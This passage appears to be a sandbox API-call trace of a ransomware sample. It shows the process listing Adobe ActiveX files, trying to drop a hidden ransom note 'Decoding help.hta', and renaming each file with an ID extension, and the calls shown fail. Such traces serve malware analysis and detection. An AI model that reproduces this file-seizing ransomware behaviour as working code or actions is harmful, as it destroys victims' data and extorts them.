dwReserved1=0x0, cFileName="PDFShell.RUM", cAlternateFileName="")) returned 1 [0053.179] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.179] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.179] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.179] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.179] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.179] CloseHandle (hObject=0xffffffff) returned 0 [0053.179] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.179] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.RUM") returned -1 [0053.179] lstrlenW (lpString="PDFShell.RUM") returned 12 [0053.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.179] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.179] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.RUM" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" [0053.179] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" [0053.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.[ID]g9uZrLhJaygpwRm1[ID]" [0053.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rum.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.180] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.RUS", cAlternateFileName="")) returned 1 [0053.180] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.180] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.180] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.180] CloseHandle (hObject=0xffffffff) returned 0 [0053.180] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.180] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.RUS") returned -1 [0053.180] lstrlenW (lpString="PDFShell.RUS") returned 12 [0053.180] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.180] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.180] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.RUS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" [0053.181] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" [0053.181] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.[ID]g9uZrLhJaygpwRm1[ID]" [0053.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.RUS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.rus.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.181] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.SKY", cAlternateFileName="")) returned 1 [0053.181] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.181] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.181] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.181] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.181] CloseHandle (hObject=0xffffffff) returned 0 [0053.181] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.181] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.SKY") returned -1 [0053.181] lstrlenW (lpString="PDFShell.SKY") returned 12 [0053.181] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.181] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.181] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.SKY" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" [0053.182] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" [0053.182] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.[ID]g9uZrLhJaygpwRm1[ID]" [0053.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SKY.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.sky.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.182] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d35bc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.SLV", cAlternateFileName="")) returned 1 [0053.182] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.182] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.182] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.182] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.182] CloseHandle (hObject=0xffffffff) returned 0 [0053.182] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.182] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.SLV") returned -1 [0053.182] lstrlenW (lpString="PDFShell.SLV") returned 12 [0053.182] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.182] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.182] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.SLV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" [0053.183] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" [0053.183] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.[ID]g9uZrLhJaygpwRm1[ID]" [0053.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SLV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.slv.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.191] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8039ef40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.SUO", cAlternateFileName="")) returned 1 [0053.192] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.192] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.192] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.192] CloseHandle (hObject=0xffffffff) returned 0 [0053.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.192] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.SUO") returned -1 [0053.192] lstrlenW (lpString="PDFShell.SUO") returned 12 [0053.192] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.192] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.SUO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" [0053.192] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" [0053.192] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.[ID]g9uZrLhJaygpwRm1[ID]" [0053.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.SUO.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.suo.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.201] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.SVE", cAlternateFileName="")) returned 1 [0053.201] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.201] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.201] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.201] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.201] CloseHandle (hObject=0xffffffff) returned 0 [0053.201] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.201] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.SVE") returned -1 [0053.201] lstrlenW (lpString="PDFShell.SVE") returned 12 [0053.201] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common 